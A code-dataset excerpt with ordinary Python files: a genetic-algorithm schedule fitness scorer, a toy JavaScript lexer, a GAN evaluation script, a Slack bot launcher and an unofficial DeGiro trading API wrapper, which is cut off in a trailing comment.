Dataset schema (one row per source file; ⌀ marks a nullable column):

| Column | Dtype | Range / classes | Nullable |
|---|---|---|---|
| hexsha | string | length 40 | |
| size | int64 | 3 to 1.03M | |
| ext | string | 10 classes | |
| lang | string | 1 class | |
| max_stars_repo_path | string | length 3 to 972 | |
| max_stars_repo_name | string | length 6 to 130 | |
| max_stars_repo_head_hexsha | string | length 40 to 78 | |
| max_stars_repo_licenses | list | length 1 to 10 | |
| max_stars_count | int64 | 1 to 191k | ⌀ |
| max_stars_repo_stars_event_min_datetime | string | length 24 | ⌀ |
| max_stars_repo_stars_event_max_datetime | string | length 24 | ⌀ |
| max_issues_repo_path | string | length 3 to 972 | |
| max_issues_repo_name | string | length 6 to 130 | |
| max_issues_repo_head_hexsha | string | length 40 to 78 | |
| max_issues_repo_licenses | list | length 1 to 10 | |
| max_issues_count | int64 | 1 to 116k | ⌀ |
| max_issues_repo_issues_event_min_datetime | string | length 24 | ⌀ |
| max_issues_repo_issues_event_max_datetime | string | length 24 | ⌀ |
| max_forks_repo_path | string | length 3 to 972 | |
| max_forks_repo_name | string | length 6 to 130 | |
| max_forks_repo_head_hexsha | string | length 40 to 78 | |
| max_forks_repo_licenses | list | length 1 to 10 | |
| max_forks_count | int64 | 1 to 105k | ⌀ |
| max_forks_repo_forks_event_min_datetime | string | length 24 | ⌀ |
| max_forks_repo_forks_event_max_datetime | string | length 24 | ⌀ |
| content | string | length 3 to 1.03M | |
| avg_line_length | float64 | 1.13 to 941k | |
| max_line_length | int64 | 2 to 941k | |
| alphanum_fraction | float64 | 0 to 1 | |
hexsha: ba800bf3fafd4d1117b5751ba64320b7d4c9cfab | size: 4,794 | ext: py | lang: Python
max_stars: path=genetics/fitnessTest.py, repo=TeamAbstract/GeneticScheduling, head=8c2830b595c8389af372d9fbf02abed2ea2cfa5c, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_issues: path=genetics/fitnessTest.py, repo=TeamAbstract/GeneticScheduling, head=8c2830b595c8389af372d9fbf02abed2ea2cfa5c, licenses=["Apache-2.0"], count=6, event_min=2015-02-27T14:27:52.000Z, event_max=2016-01-14T11:11:15.000Z
max_forks: path=genetics/fitnessTest.py, repo=TeamAbstract/GeneticScheduling, head=8c2830b595c8389af372d9fbf02abed2ea2cfa5c, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
content (genetics/fitnessTest.py):
from datetime import datetime as DateTime
from genetics.genepool import GenePool
from vessels import Vessels
from schedule import Schedule
import util
import settings
class FitnessTest:
# Weighting #TODO fine tune weighting
bonusPerHourTillDeadline = 5
penaltyPerHourOverDeadline = -10
penaltyPerHourOverlapping = -5
penaltyPerHourIdle = -2
totalTimeWeight = -1
penaltyForOutOfHours = -10
percentageTimeUsedWeight = 5
startTime = DateTime.now()
@staticmethod
def testPool(genepool):
"""! tests every schedule in the genePool that is passed to it
:param genepool: genepool containing the schedules to be tested
:type genepool: GenePool
"""
assert isinstance(genepool, GenePool)
# print("Testing ", len(genepool.schedules), " schedules")
for schedule in genepool.schedules:
FitnessTest.testSchedule(schedule)
@staticmethod
def testSchedule(schedule):
# TODO more requirements
"""
        Tests a single schedule for its fitness
:param schedule: schedule to be tested
:type schedule: Schedule
"""
# print("Testing schedule ", schedule.id)
fitness = 100
schedule.flags = set()
fitness += FitnessTest.timeToDeadline(schedule)
fitness += FitnessTest.isOverDeadline(schedule)
fitness += FitnessTest.isOverlapping(schedule)
fitness += FitnessTest.checkIdleVessels(schedule)
fitness += FitnessTest.testTotalTime(schedule)
fitness += FitnessTest.testOutOfHours(schedule)
fitness += FitnessTest.testPercentageUsed(schedule)
# print("score of ", fitness)
schedule.fitness = fitness
@staticmethod
def timeToDeadline(schedule):
score = 0
for task in schedule.tasks:
if task.product.dueDate is None:
continue
            # hours of headroom before the deadline (positive when the task, including cooldown, finishes early)
            dTime = task.product.dueDate - util.addDateTimeAndTime(task.getEndTime(), task.coolDown)
            score += util.getTotalHours(dTime) * FitnessTest.bonusPerHourTillDeadline
return score
@staticmethod
def isOverDeadline(schedule):
score = 0
for task in schedule.tasks:
if task.product.dueDate is None:
continue
dTime = util.addDateTimeAndTime(task.getEndTime(), task.coolDown) - task.product.dueDate
            partialScore = util.getTotalHours(dTime) * FitnessTest.penaltyPerHourOverDeadline
            # penaltyPerHourOverDeadline is negative, so only apply it when the task actually overruns its deadline
            if partialScore < 0:
                score += partialScore
return score
@staticmethod
def isOverlapping(schedule):
"""! Tests if tasks on a schedule are overlapping
:param schedule: schedule to test
:type schedule: Schedule
:return: score
"""
score = 0
for index, task in enumerate(schedule.tasks[:-1]):
            for otherTask in schedule.tasks[index + 1:]:  # compare against later tasks only, not the task itself
                if task.getEndTime() <= otherTask.startTime:  # if no overlap
                    continue
                schedule.flags.add("Olap")
                # overlapping span, assuming tasks are ordered by start time
                hoursOverlapping = task.getEndTime() - otherTask.startTime
score += util.getTotalHours(hoursOverlapping) * FitnessTest.penaltyPerHourOverlapping
return score
@staticmethod
def checkIdleVessels(schedule):
score = 0
for vessel in Vessels.vessels:
timeCurrent = None
for task in schedule.tasks:
if task.vessel == vessel:
                    if timeCurrent is not None:
                        score += util.getTotalHours(task.startTime - timeCurrent) * FitnessTest.penaltyPerHourIdle
                    # advance to the end of this task (plus cleaning) before measuring the next idle gap
                    timeCurrent = task.getEndTime() + task.cleanTime
return score
@staticmethod
def testTotalTime(schedule):
"""! return total time that the schedule uses including brewtime and cleaning
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
assert isinstance(schedule, Schedule)
return util.getTotalHours(schedule.getTotalTime()) * FitnessTest.totalTimeWeight
@staticmethod
def testPercentageUsed(schedule):
"""! checks what percentage of each vessel's time is spent idle
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
lastTask = schedule.tasks[0]
for task in schedule.tasks[1:]:
if task.getEndTime() > lastTask.getEndTime():
lastTask = task
totalTime = util.getTotalHours(schedule.getTotalTime())/len(Vessels.vessels)
timeToEnd = util.getTotalHours(lastTask.getEndTime() - FitnessTest.startTime)
return (timeToEnd/totalTime) * FitnessTest.percentageTimeUsedWeight
@staticmethod
def testOutOfHours(schedule):
"""! Check if the schedule has anything finishing out of hours
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
assert isinstance(schedule, Schedule)
score = 0
for task in schedule.tasks:
if not settings.openingTime < task.startTime.time() < settings.closingTime:
score += FitnessTest.penaltyForOutOfHours
schedule.flags.add("outHs") # out of hours start
if not settings.openingTime < task.getEndTime().time() < settings.closingTime:
score += FitnessTest.penaltyForOutOfHours
schedule.flags.add("outHe") # out of hours end
return score
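# Usage sketch (appended for illustration, not part of the original module).
# Constructing a GenePool with no arguments is an assumption; in the real
# project the pool is populated from task and vessel data beforehand.
if __name__ == "__main__":
    pool = GenePool()  # hypothetical empty pool
    FitnessTest.testPool(pool)  # scores every schedule in the pool
    if pool.schedules:
        best = max(pool.schedules, key=lambda s: s.fitness)
        print(best.fitness, best.flags)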
avg_line_length: 29.411043 | max_line_length: 96 | alphanum_fraction: 0.744472

hexsha: ac9ef7f3ffeda6b7c1fde06d4515dfa110d65ba2 | size: 4,004 | ext: py | lang: Python
max_stars: path=jsparser/lexer.py, repo=sandin/JSParser, head=1b894d5be90e8a0669f1d730a05cf4cf40509e60, licenses=["Apache-2.0"], count=1, event_min=2021-11-01T01:50:39.000Z, event_max=2021-11-01T01:50:39.000Z
max_issues: path=jsparser/lexer.py, repo=sandin/JSParser, head=1b894d5be90e8a0669f1d730a05cf4cf40509e60, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=jsparser/lexer.py, repo=sandin/JSParser, head=1b894d5be90e8a0669f1d730a05cf4cf40509e60, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
content (jsparser/lexer.py):
import enum
g_last_char: str = ' '
g_identifier_str: str = None
g_number_val: float = 0
g_cur_token = None
def reset():
global g_last_char, g_identifier_str, g_number_val, g_cur_token
g_last_char = ' '
g_identifier_str = None
g_number_val = 0
g_cur_token = None
class Token(enum.IntEnum):
EOF = -1
IDENTIFIER = -2
NUMBER = -3
NEW_LINE = -4
# keywords:
FUNCTION = -5
RETURN = -6
VAR = -7
IF = -8
THEN = -9
ELSE = -10
#BLOCK = -11
#PAREN = -12
g_keywords = {
"function": Token.FUNCTION,
"return": Token.RETURN,
"var": Token.VAR,
"if": Token.IF,
"else": Token.ELSE
}
class StringBuffer(object):
def __init__(self, value):
self._value = value
self._index = 0
self._length = len(value)
def getchar(self, peek = False):
if self._index < self._length:
c = self._value[self._index]
if not peek:
self._index += 1
return c
return None # EOF
def eof(self):
        return self._index >= self._length
    def curline(self):
        # walk back to the start of the current line
        start_index = self._index
        while start_index > 0 and self._value[start_index - 1] not in ("\r", "\n"):
            start_index -= 1
        # walk forward to the end of the current line
        end_index = self._index
        while end_index < self._length and self._value[end_index] not in ("\r", "\n"):
            end_index += 1
        return self._value[start_index:end_index]
def get_token(code: StringBuffer):
global g_last_char, g_identifier_str, g_number_val
# skip the whitespace
while g_last_char and g_last_char.isspace():
g_last_char = code.getchar()
if g_last_char is None: # EOF
return Token.EOF
if g_last_char.isalpha() or g_last_char == "_": # identifier: [a-zA-Z][a-zA-Z0-9]*
g_identifier_str = g_last_char
g_last_char = code.getchar()
        while g_last_char and (g_last_char.isalnum() or g_last_char == "_"):
g_identifier_str += g_last_char
g_last_char = code.getchar()
if g_identifier_str in g_keywords:
return g_keywords[g_identifier_str]
return Token.IDENTIFIER
if g_last_char.isdigit(): # Number: [0-9.]
num_str = g_last_char
g_last_char = code.getchar()
        while g_last_char and (g_last_char.isdigit() or g_last_char == "."):
num_str += g_last_char
g_last_char = code.getchar()
g_number_val = float(num_str)
return Token.NUMBER
if g_last_char == "/":
next_char = code.getchar(peek=True)
        if next_char == "/":  # // comment until end of line
            code.getchar()  # consume the second '/' (the first is already in g_last_char)
g_last_char = code.getchar()
while g_last_char and g_last_char != "\n" and g_last_char != "\r":
g_last_char = code.getchar()
if g_last_char:
return get_token(code)
if g_last_char == "\r" or g_last_char == "\n" or g_last_char == ";":
print("eat nl", g_last_char)
g_last_char = code.getchar() # eat nl
#while g_last_char == "\r" or g_last_char == "\n" or g_last_char == ";":
# print("eat nl2", g_last_char)
# g_last_char = code.getchar()
return Token.NEW_LINE
#if g_last_char == "{":
# g_last_char = code.getchar() # eat `{`
# return Token.BLOCK
#if g_last_char == "(":
# g_last_char = code.getchar() # eat `(`
# return Token.PAREN
this_char = g_last_char
g_last_char = code.getchar()
return this_char
def get_next_token(code: StringBuffer):
global g_cur_token
g_cur_token = get_token(code)
print("[Token] get_next_token, g_cur_token=%s, g_last_char=%s, g_identifier_str=%s, g_number_val=%d" % (g_cur_token, g_last_char, g_identifier_str, g_number_val))
return g_cur_token
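# Usage sketch (appended for illustration, not part of the original module):
# tokenize a small JavaScript snippet with the lexer above. Negative values
# are Token enum members; single characters come back unchanged.
if __name__ == "__main__":
    reset()
    buf = StringBuffer("var answer = 42 // the answer\n")
    tok = get_next_token(buf)
    while tok != Token.EOF:
        tok = get_next_token(buf)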
avg_line_length: 28.197183 | max_line_length: 166 | alphanum_fraction: 0.586414

hexsha: d8a1e985680f36bc9afa3d80da767f2fe34abe8e | size: 11,308 | ext: py | lang: Python
max_stars: path=scripts/calc_metrics.py, repo=maua-maua-maua/nvGAN, head=edea24c58646780c9fb8ea942e49708ce9d62421, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=scripts/calc_metrics.py, repo=maua-maua-maua/nvGAN, head=edea24c58646780c9fb8ea942e49708ce9d62421, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=scripts/calc_metrics.py, repo=maua-maua-maua/nvGAN, head=edea24c58646780c9fb8ea942e49708ce9d62421, licenses=["MIT"], count=null, event_min=null, event_max=null
content (scripts/calc_metrics.py):
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Calculate quality metrics for previous training run or pretrained network pickle."""
import sys; sys.path.extend(['.', 'src'])
import copy
import json
import os
import re
import tempfile
import click
import torch
from omegaconf import OmegaConf
from src import dnnlib
from src.torch_utils import custom_ops, misc, training_stats
import legacy
from metrics import metric_main, metric_utils
#----------------------------------------------------------------------------
def subprocess_fn(rank, args, temp_dir):
dnnlib.util.Logger(should_flush=True)
# Init torch.distributed.
if args.num_gpus > 1:
init_file = os.path.abspath(os.path.join(temp_dir, '.torch_distributed_init'))
if os.name == 'nt':
init_method = 'file:///' + init_file.replace('\\', '/')
torch.distributed.init_process_group(backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus)
else:
init_method = f'file://{init_file}'
torch.distributed.init_process_group(backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus)
# Init torch_utils.
sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None
training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)
if rank != 0 or not args.verbose:
custom_ops.verbosity = 'none'
# Print network summary.
device = torch.device('cuda', rank)
torch.backends.cudnn.benchmark = True
torch.backends.cuda.matmul.allow_tf32 = False
torch.backends.cudnn.allow_tf32 = False
G = copy.deepcopy(args.G).eval().requires_grad_(False).to(device)
if rank == 0 and args.verbose:
z = torch.empty([8, G.z_dim], device=device)
c = torch.empty([8, G.c_dim], device=device)
t = torch.zeros([8, G.cfg.sampling.num_frames_per_sample], device=device).long()
l = torch.zeros([8], device=device).float()
misc.print_module_summary(G, dict(z=z, c=c, t=t[:, 0], l=l))
# Calculate each metric.
for metric in args.metrics:
if rank == 0 and args.verbose:
print(f'Calculating {metric}...')
progress = metric_utils.ProgressMonitor(verbose=args.verbose)
result_dict = metric_main.calc_metric(
metric=metric,
G=G,
dataset_kwargs=args.dataset_kwargs,
num_gpus=args.num_gpus,
rank=rank,
device=device,
progress=progress,
cache=args.use_cache,
num_runs=(1 if metric == 'fid50k_full' else args.num_runs),
)
if rank == 0:
metric_main.report_metric(result_dict, run_dir=args.run_dir, snapshot_pkl=args.network_pkl)
if rank == 0 and args.verbose:
print()
# Done.
if rank == 0 and args.verbose:
print('Exiting...')
#----------------------------------------------------------------------------
class CommaSeparatedList(click.ParamType):
name = 'list'
def convert(self, value, param, ctx):
_ = param, ctx
if value is None or value.lower() == 'none' or value == '':
return []
return value.split(',')
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--network_pkl', '--network', help='Network pickle filename or URL', metavar='PATH')
@click.option('--networks_dir', '--networks_dir', help='Path to the experiment directory if the latest checkpoint is requested.', metavar='PATH')
@click.option('--metrics', help='Comma-separated list or "none"', type=CommaSeparatedList(), default='fid50k_full', show_default=True)
@click.option('--data', help='Dataset to evaluate metrics against (directory or zip) [default: same as training data]', metavar='PATH')
@click.option('--mirror', help='Whether the dataset was augmented with x-flips during training [default: look up]', type=bool, metavar='BOOL')
@click.option('--gpus', help='Number of GPUs to use', type=int, default=1, metavar='INT', show_default=True)
@click.option('--cfg_path', help='Path to the experiments config', type=str, default="auto", metavar='PATH')
@click.option('--verbose', help='Print optional information', type=bool, default=False, metavar='BOOL', show_default=True)
@click.option('--use_cache', help='Should we use the cache file?', type=bool, default=True, metavar='BOOL', show_default=True)
@click.option('--num_runs', help='Number of runs', type=int, default=1, metavar='INT', show_default=True)
def calc_metrics(ctx, network_pkl, networks_dir, metrics, data, mirror, gpus, cfg_path, verbose, use_cache: bool, num_runs: int):
"""Calculate quality metrics for previous training run or pretrained network pickle.
Examples:
\b
# Previous training run: look up options automatically, save result to JSONL file.
python calc_metrics.py --metrics=pr50k3_full \\
--network=~/training-runs/00000-ffhq10k-res64-auto1/network-snapshot-000000.pkl
\b
# Pre-trained network pickle: specify dataset explicitly, print result to stdout.
python calc_metrics.py --metrics=fid50k_full --data=~/datasets/ffhq.zip --mirror=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/ffhq.pkl
Available metrics:
\b
ADA paper:
fid50k_full Frechet inception distance against the full dataset.
kid50k_full Kernel inception distance against the full dataset.
      pr50k3_full  Precision and recall against the full dataset.
is50k Inception score for CIFAR-10.
\b
StyleGAN and StyleGAN2 papers:
fid50k Frechet inception distance against 50k real images.
kid50k Kernel inception distance against 50k real images.
pr50k3 Precision and recall against 50k real images.
ppl2_wend Perceptual path length in W at path endpoints against full image.
ppl_zfull Perceptual path length in Z for full paths against cropped image.
ppl_wfull Perceptual path length in W for full paths against cropped image.
ppl_zend Perceptual path length in Z at path endpoints against cropped image.
ppl_wend Perceptual path length in W at path endpoints against cropped image.
"""
dnnlib.util.Logger(should_flush=True)
if network_pkl is None:
        output_regex = r"^network-snapshot-\d{6}\.pkl$"
        ckpt_regex = re.compile(output_regex)
# ckpts = sorted([f for f in os.listdir(networks_dir) if ckpt_regex.match(f)])
# network_pkl = os.path.join(networks_dir, ckpts[-1])
metrics_file = os.path.join(networks_dir, 'metric-fvd2048_16f.jsonl')
with open(metrics_file, 'r') as f:
snapshot_metrics_vals = [json.loads(line) for line in f.read().splitlines()]
best_snapshot = sorted(snapshot_metrics_vals, key=lambda m: m['results']['fvd2048_16f'])[0]
network_pkl = os.path.join(networks_dir, best_snapshot['snapshot_pkl'])
print(f'Using checkpoint: {network_pkl} with FVD16 of', best_snapshot['results']['fvd2048_16f'])
# Selecting a checkpoint with the best score
# Validate arguments.
args = dnnlib.EasyDict(metrics=metrics, num_gpus=gpus, network_pkl=network_pkl, verbose=verbose)
if cfg_path == "auto":
# Assuming that `network_pkl` has the structure /path/to/experiment/output/network-X.pkl
output_path = os.path.dirname(network_pkl)
assert os.path.basename(output_path) == "output", f"Unknown path structure: {output_path}"
experiment_path = os.path.dirname(output_path)
cfg_path = os.path.join(experiment_path, 'experiment_config.yaml')
cfg = OmegaConf.load(cfg_path)
if not all(metric_main.is_valid_metric(metric) for metric in args.metrics):
ctx.fail('\n'.join(['--metrics can only contain the following values:'] + metric_main.list_valid_metrics()))
if not args.num_gpus >= 1:
ctx.fail('--gpus must be at least 1')
# Load network.
if not dnnlib.util.is_url(network_pkl, allow_file_urls=True) and not os.path.isfile(network_pkl):
ctx.fail('--network must point to a file or URL')
if args.verbose:
print(f'Loading network from "{network_pkl}"...')
with dnnlib.util.open_url(network_pkl, verbose=args.verbose) as f:
network_dict = legacy.load_network_pkl(f)
args.G = network_dict['G_ema'] # subclass of torch.nn.Module
from src.training.networks import Generator
G = args.G
G.cfg.z_dim = G.z_dim
G_new = Generator(
w_dim=G.cfg.w_dim,
mapping_kwargs=dnnlib.EasyDict(num_layers=G.cfg.get('mapping_net_n_layers', 2), cfg=G.cfg),
synthesis_kwargs=dnnlib.EasyDict(
channel_base=int(G.cfg.get('fmaps', 0.5) * 32768),
channel_max=G.cfg.get('channel_max', 512),
num_fp16_res=4,
conv_clamp=256,
),
cfg=G.cfg,
img_resolution=256,
img_channels=3,
c_dim=G.cfg.c_dim,
).eval()
G_new.load_state_dict(G.state_dict())
args.G = G_new
# Initialize dataset options.
if data is not None:
args.dataset_kwargs = dnnlib.EasyDict(class_name='training.dataset.VideoFramesFolderDataset', cfg=cfg.dataset, path=data)
elif network_dict['training_set_kwargs'] is not None:
args.dataset_kwargs = dnnlib.EasyDict(network_dict['training_set_kwargs'])
else:
ctx.fail('Could not look up dataset options; please specify --data')
# Finalize dataset options.
args.dataset_kwargs.resolution = args.G.img_resolution
args.dataset_kwargs.use_labels = (args.G.c_dim != 0)
if mirror is not None:
args.dataset_kwargs.xflip = mirror
args.use_cache = use_cache
args.num_runs = num_runs
# Print dataset options.
if args.verbose:
print('Dataset options:')
print(cfg.dataset)
# Locate run dir.
args.run_dir = None
if os.path.isfile(network_pkl):
pkl_dir = os.path.dirname(network_pkl)
if os.path.isfile(os.path.join(pkl_dir, 'training_options.json')):
args.run_dir = pkl_dir
# Launch processes.
if args.verbose:
print('Launching processes...')
torch.multiprocessing.set_start_method('spawn')
with tempfile.TemporaryDirectory() as temp_dir:
if args.num_gpus == 1:
subprocess_fn(rank=0, args=args, temp_dir=temp_dir)
else:
torch.multiprocessing.spawn(fn=subprocess_fn, args=(args, temp_dir), nprocs=args.num_gpus)
#----------------------------------------------------------------------------
if __name__ == "__main__":
calc_metrics() # pylint: disable=no-value-for-parameter
#----------------------------------------------------------------------------
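# Smoke-test sketch (appended for illustration, not part of the original
# script): it only exercises the --help path via click's test runner; running
# real metrics needs a GPU, a network pickle and the training dataset.
#
#     from click.testing import CliRunner
#
#     result = CliRunner().invoke(calc_metrics, ["--help"])
#     print(result.output)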
avg_line_length: 45.051793 | max_line_length: 145 | alphanum_fraction: 0.653962

hexsha: 1900c8f148f0541570397e724a6c6531deb98b2b | size: 177 | ext: py | lang: Python
max_stars: path=run.py, repo=hhoosshhii53pinkwest/shiritori, head=d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=run.py, repo=hhoosshhii53pinkwest/shiritori, head=d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=run.py, repo=hhoosshhii53pinkwest/shiritori, head=d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2, licenses=["MIT"], count=null, event_min=null, event_max=null
content (run.py):
# -*- coding: utf-8 -*-
from slackbot.bot import Bot
def main():
bot = Bot()
bot.run()
if __name__ == "__main__":
print('start slackbot')
main()
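# Note (appended for illustration): the slackbot package looks for a
# `slackbot_settings.py` module on the import path at startup. A minimal one
# looks roughly like the sketch below (the token value is a placeholder):
#
#     API_TOKEN = "xoxb-your-bot-token"
#     DEFAULT_REPLY = "?"
#     PLUGINS = ["plugins"]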
avg_line_length: 16.090909 | max_line_length: 29 | alphanum_fraction: 0.525424

hexsha: 3b9a8d08f3541e93cee07aa304e8c8a3313755e9 | size: 10,173 | ext: py | lang: Python
max_stars: path=degiroapi/__init__.py, repo=SilageTime/DegiroAPI, head=b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=degiroapi/__init__.py, repo=SilageTime/DegiroAPI, head=b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=degiroapi/__init__.py, repo=SilageTime/DegiroAPI, head=b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785, licenses=["MIT"], count=null, event_min=null, event_max=null
content (degiroapi/__init__.py):
import requests
from degiroapi.order import Order
from degiroapi.client_info import ClientInfo
from degiroapi.datatypes import Data
class DeGiro:
__LOGIN_URL = 'https://trader.degiro.nl/login/secure/login'
__LOGOUT_URL = 'https://trader.degiro.nl/trading/secure/logout'
__CLIENT_INFO_URL = 'https://trader.degiro.nl/pa/secure/client'
__GET_STOCKS_URL = 'https://trader.degiro.nl/products_s/secure/v5/stocks'
__PRODUCT_SEARCH_URL = 'https://trader.degiro.nl/product_search/secure/v5/products/lookup'
__TRANSACTIONS_URL = 'https://trader.degiro.nl/reporting/secure/v4/transactions'
__ORDERS_URL = 'https://trader.degiro.nl/reporting/secure/v4/order-history'
__PLACE_ORDER_URL = 'https://trader.degiro.nl/trading/secure/v5/checkOrder'
__CONFIRM_ORDER_URL = 'https://trader.degiro.nl/trading/secure/v5/order/'
__DATA_URL = 'https://trader.degiro.nl/trading/secure/v5/update/'
__GET_REQUEST = 0
__POST_REQUEST = 1
session_id = any
client_info = any
confirmation_id = any
def login(self, username, password):
login_payload = {
'username': username,
'password': password,
'isPassCodeReset': False,
'isRedirectToMobile': False
}
login_response = self.__request(DeGiro.__LOGIN_URL, login_payload, request_type=DeGiro.__POST_REQUEST,
error_message='Could not login.')
self.session_id = login_response['sessionId']
client_info_payload = {'sessionId': self.session_id}
client_info_response = self.__request(DeGiro.__CLIENT_INFO_URL, client_info_payload,
error_message='Could not get client info.')
self.client_info = ClientInfo(client_info_response['data'])
return client_info_response
def logout(self):
logout_payload = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
self.__request(DeGiro.__LOGOUT_URL + ';jsessionid=' + self.session_id, logout_payload, error_message='Could not log out')
@staticmethod
def __request(url, payload, post_params=None, request_type=__GET_REQUEST, error_message='An error occurred.'):
if request_type == DeGiro.__GET_REQUEST:
response = requests.get(url, params=payload)
elif request_type == DeGiro.__POST_REQUEST and post_params:
response = requests.post(url, params=post_params, json=payload)
elif request_type == DeGiro.__POST_REQUEST:
response = requests.post(url, json=payload)
else:
raise Exception(f'Unknown request type: {request_type}')
if response.status_code == 200 or response.status_code == 201:
try:
return response.json()
            except ValueError:  # response body was not valid JSON
return "No data"
else:
raise Exception(f'{error_message} Response: {response.text}')
def search_products(self, search_text, limit=1):
product_search_payload = {
'searchText': search_text,
'limit': limit,
'offset': 0,
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return \
self.__request(DeGiro.__PRODUCT_SEARCH_URL, product_search_payload,
error_message='Could not get products.')[
'products']
def transactions(self, from_date, to_date, group_transactions=False):
transactions_payload = {
'fromDate': from_date.strftime('%d/%m/%Y'),
'toDate': to_date.strftime('%d/%m/%Y'),
'group_transactions_by_order': group_transactions,
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return \
self.__request(DeGiro.__TRANSACTIONS_URL, transactions_payload,
error_message='Could not get transactions.')[
'data']
def orders(self, from_date, to_date):
orders_payload = {
'fromDate': from_date.strftime('%d/%m/%Y'),
'toDate': to_date.strftime('%d/%m/%Y'),
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
# max 90 days
if (to_date - from_date).days > 90:
raise Exception('The maximum timespan is 90 days')
return self.__request(DeGiro.__ORDERS_URL, orders_payload, error_message='Could not get orders.')['data']
@staticmethod
def filtercachfunds(cachfunds):
data = []
for item in cachfunds['cashFunds']['value']:
if item['value'][2]['value'] != 0:
data.append(item['value'][1]['value'] + " " + str(item['value'][2]['value']))
return data
@staticmethod
def filterportfolio(portfolio):
data = []
for item in portfolio['portfolio']['value']:
data.append(item['value'][0]['name'] + " " + str(item['value'][0]['value']) + " , " +
item['value'][1]['name'] + " " + item['value'][1]['value'] + " , " +
item['value'][2]['name'] + " " + str(item['value'][2]['value']) + " , " +
item['value'][3]['name'] + " " + str(item['value'][3]['value']) + " , " +
item['value'][4]['name'] + " " + str(item['value'][4]['value']) + " , " +
item['value'][9]['name'] + " " + str(item['value'][9]['value']))
return data
def getdata(self, datatype):
data_payload = {
datatype: 0
}
if datatype == Data.Type.CACHFUNDS:
return self.filtercachfunds(
self.__request(DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id,
data_payload, error_message='Could not get data'))
elif datatype == Data.Type.PORTFOLIO:
return self.filterportfolio(
self.__request(DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id,
data_payload, error_message='Could not get data'))
else:
return self.__request(
DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id, data_payload, error_message='Could not get data')
def buyorder(self, orderType, productId, timeType, size, limit=None, stop_loss=None):
place_buy_order_params = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
place_buy_order_payload = {
'buySell': "BUY",
'orderType': orderType,
'productId': productId,
'timeType': timeType,
'size': size,
'price': limit,
'stopPrice': stop_loss,
}
if orderType != Order.Type.STOPLIMIT and orderType != Order.Type.MARKET \
and orderType != Order.Type.LIMIT and orderType != Order.Type.STOPLOSS:
raise Exception('Invalid order type')
if timeType != 1 and timeType != 3:
raise Exception('Invalid time type')
place_check_order_response = self.__request(DeGiro.__PLACE_ORDER_URL + ';jsessionid=' + self.session_id,
place_buy_order_payload, place_buy_order_params,
request_type=DeGiro.__POST_REQUEST,
error_message='Could not place order')
self.confirmation_id = place_check_order_response['data']['confirmationId']
self.__request(DeGiro.__CONFIRM_ORDER_URL + self.confirmation_id + ';jsessionid=' + self.session_id,
place_buy_order_payload, place_buy_order_params, request_type=DeGiro.__POST_REQUEST,
error_message='Could not confirm order')
def sellorder(self, orderType, productId, timeType, size, limit=None, stop_loss=None):
place_sell_order_params = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
place_sell_order_payload = {
'buySell': "SELL",
'orderType': orderType,
'productId': productId,
'timeType': timeType,
'size': size,
'price': limit,
'stopPrice': stop_loss,
}
if orderType != Order.Type.STOPLIMIT and orderType != Order.Type.MARKET \
and orderType != Order.Type.LIMIT and orderType != Order.Type.STOPLOSS:
raise Exception('Invalid order type')
if timeType != 1 and timeType != 3:
raise Exception('Invalid time type')
place_check_order_response = self.__request(DeGiro.__PLACE_ORDER_URL + ';jsessionid=' + self.session_id,
place_sell_order_payload, place_sell_order_params,
request_type=DeGiro.__POST_REQUEST,
error_message='Could not place order')
self.confirmation_id = place_check_order_response['data']['confirmationId']
self.__request(DeGiro.__CONFIRM_ORDER_URL + self.confirmation_id + ';jsessionid=' + self.session_id,
place_sell_order_payload, place_sell_order_params, request_type=DeGiro.__POST_REQUEST,
error_message='Could not confirm order')
def get_stock_list(self, indexId, stockCountryId):
stock_list_params = {
'indexId': indexId,
'stockCountryId': stockCountryId,
'offset': 0,
'limit': None,
'requireTotal': "true",
'sortColumns': "name",
'sortTypes': "asc",
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return self.__request(DeGiro.__GET_STOCKS_URL, stock_list_params, error_message='Could not get stock list')[
'products']
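# Usage sketch (appended for illustration, not part of the original module).
# The credentials below are placeholders; calls go against DEGIRO's live API,
# so this is only an outline of the call order, not a runnable test.
#
#     from datetime import datetime, timedelta
#     from degiroapi import DeGiro
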